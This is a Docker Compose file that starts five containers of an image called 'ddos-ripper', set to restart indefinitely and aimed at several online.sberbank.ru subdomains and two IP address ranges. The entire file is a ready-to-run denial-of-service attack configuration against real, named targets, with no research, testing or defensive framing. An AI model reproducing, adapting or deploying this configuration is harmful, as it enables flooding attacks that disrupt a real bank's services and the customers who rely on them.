version: '3'
services:
  ddos-runner-1:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: stories-stat.online.sberbank.ru
  ddos-runner-2:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: clickstream.online.sberbank.ru
  ddos-runner-3:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: stat.online.sberbank.ru
  ddos-runner-4:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: 91.215.36.0/22
  ddos-runner-5:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: 195.209.150.0/24
